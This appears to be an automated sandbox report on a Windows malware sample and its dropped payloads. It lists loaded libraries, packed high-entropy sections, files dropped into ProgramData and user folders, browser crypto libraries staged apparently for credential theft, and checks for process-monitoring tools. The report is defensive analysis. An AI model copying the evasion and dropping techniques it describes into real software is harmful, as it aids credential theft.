Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: winmm.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: wininet.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: sspicli.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: uxtheme.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: mstask.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: windows.storage.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: wldp.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: mpr.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: dui70.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: duser.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: chartv.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: oleacc.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: atlthunk.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: textinputframework.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: ntmarta.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: winsta.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: textshaping.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: propsys.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: iertutil.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: profapi.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: explorerframe.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: edputil.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: urlmon.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: srvcli.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: netutils.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: appresolver.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: slc.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: userenv.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: sppc.dll
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Google Drive.lnk.3.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.3.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.3.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.3.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.3.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.3.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1833472 > 1048576
Source: file.exe Static PE information: Raw size of udcxivdk is bigger than: 0x100000 < 0x1a5c00
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2037877310.000000006CABD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2038311729.000000006CC7F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2038311729.000000006CC7F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2037877310.000000006CABD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;udcxivdk:EW;ohgcfufd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;udcxivdk:EW;ohgcfufd:EW;.taggant:EW;
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Unpacked PE file: 24.2.DocumentsCAEHDBAAEC.exe.df0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;umzmfkfc:EW;eqgvdfkx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;umzmfkfc:EW;eqgvdfkx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 25.2.skotes.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;umzmfkfc:EW;eqgvdfkx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;umzmfkfc:EW;eqgvdfkx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 26.2.skotes.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;umzmfkfc:EW;eqgvdfkx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;umzmfkfc:EW;eqgvdfkx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 29.2.skotes.exe.fb0000.1.unpack :EW;.rsrc:W;.idata :W; :EW;umzmfkfc:EW;eqgvdfkx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;umzmfkfc:EW;eqgvdfkx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Unpacked PE file: 30.2.eDPQZkT.exe.b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tjxhgeed:EW;ccdijxqb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tjxhgeed:EW;ccdijxqb:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA43480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6CA43480
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: eDPQZkT[1].exe.29.dr Static PE information: real checksum: 0x1d42c7 should be: 0x1cc6a7
Source: eDPQZkT.exe.29.dr Static PE information: real checksum: 0x1d42c7 should be: 0x1cc6a7
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: real checksum: 0x1d6c48 should be: 0x1dfcd4
Source: random[1].exe.29.dr Static PE information: real checksum: 0x43c911 should be: 0x139f94
Source: file.exe Static PE information: real checksum: 0x1c2dbe should be: 0x1c9682
Source: random[1].exe.0.dr Static PE information: real checksum: 0x1d6c48 should be: 0x1dfcd4
Source: ead1a5c329.exe.29.dr Static PE information: real checksum: 0x43c911 should be: 0x139f94
Source: skotes.exe.24.dr Static PE information: real checksum: 0x1d6c48 should be: 0x1dfcd4
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: udcxivdk
Source: file.exe Static PE information: section name: ohgcfufd
Source: file.exe Static PE information: section name: .taggant
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: section name:
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: section name: .idata
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: section name:
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: section name: umzmfkfc
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: section name: eqgvdfkx
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: umzmfkfc
Source: random[1].exe.0.dr Static PE information: section name: eqgvdfkx
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: skotes.exe.24.dr Static PE information: section name:
Source: skotes.exe.24.dr Static PE information: section name: .idata
Source: skotes.exe.24.dr Static PE information: section name:
Source: skotes.exe.24.dr Static PE information: section name: umzmfkfc
Source: skotes.exe.24.dr Static PE information: section name: eqgvdfkx
Source: skotes.exe.24.dr Static PE information: section name: .taggant
Source: eDPQZkT[1].exe.29.dr Static PE information: section name:
Source: eDPQZkT[1].exe.29.dr Static PE information: section name: .idata
Source: eDPQZkT[1].exe.29.dr Static PE information: section name:
Source: eDPQZkT[1].exe.29.dr Static PE information: section name: tjxhgeed
Source: eDPQZkT[1].exe.29.dr Static PE information: section name: ccdijxqb
Source: eDPQZkT[1].exe.29.dr Static PE information: section name: .taggant
Source: eDPQZkT.exe.29.dr Static PE information: section name:
Source: eDPQZkT.exe.29.dr Static PE information: section name: .idata
Source: eDPQZkT.exe.29.dr Static PE information: section name:
Source: eDPQZkT.exe.29.dr Static PE information: section name: tjxhgeed
Source: eDPQZkT.exe.29.dr Static PE information: section name: ccdijxqb
Source: eDPQZkT.exe.29.dr Static PE information: section name: .taggant
Source: random[1].exe.29.dr Static PE information: section name:
Source: random[1].exe.29.dr Static PE information: section name: .rsrc
Source: random[1].exe.29.dr Static PE information: section name: .idata
Source: random[1].exe.29.dr Static PE information: section name:
Source: random[1].exe.29.dr Static PE information: section name: vbnvzqtd
Source: random[1].exe.29.dr Static PE information: section name: ugjoxxza
Source: random[1].exe.29.dr Static PE information: section name: .taggant
Source: ead1a5c329.exe.29.dr Static PE information: section name:
Source: ead1a5c329.exe.29.dr Static PE information: section name: .rsrc
Source: ead1a5c329.exe.29.dr Static PE information: section name: .idata
Source: ead1a5c329.exe.29.dr Static PE information: section name:
Source: ead1a5c329.exe.29.dr Static PE information: section name: vbnvzqtd
Source: ead1a5c329.exe.29.dr Static PE information: section name: ugjoxxza
Source: ead1a5c329.exe.29.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA7B536 push ecx; ret 0_2_6CA7B549
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FCD91C push ecx; ret 29_2_00FCD92F
Source: file.exe Static PE information: section name: udcxivdk entropy: 7.955285281860381
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: section name: entropy: 7.977436096589724
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: section name: umzmfkfc entropy: 7.954247225682721
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.977436096589724
Source: random[1].exe.0.dr Static PE information: section name: umzmfkfc entropy: 7.954247225682721
Source: skotes.exe.24.dr Static PE information: section name: entropy: 7.977436096589724
Source: skotes.exe.24.dr Static PE information: section name: umzmfkfc entropy: 7.954247225682721
Source: eDPQZkT[1].exe.29.dr Static PE information: section name: entropy: 7.982250954718822
Source: eDPQZkT[1].exe.29.dr Static PE information: section name: tjxhgeed entropy: 7.953829787210989
Source: eDPQZkT.exe.29.dr Static PE information: section name: entropy: 7.982250954718822
Source: eDPQZkT.exe.29.dr Static PE information: section name: tjxhgeed entropy: 7.953829787210989

Persistence and Installation Behavior
barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsCAEHDBAAEC.exe Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsCAEHDBAAEC.exe Jump to dropped file
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\eDPQZkT[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1009009001\ead1a5c329.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsCAEHDBAAEC.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsCAEHDBAAEC.exe Jump to dropped file
Monitors registry run keys for changes
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Window searched: window name: RegmonClass
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
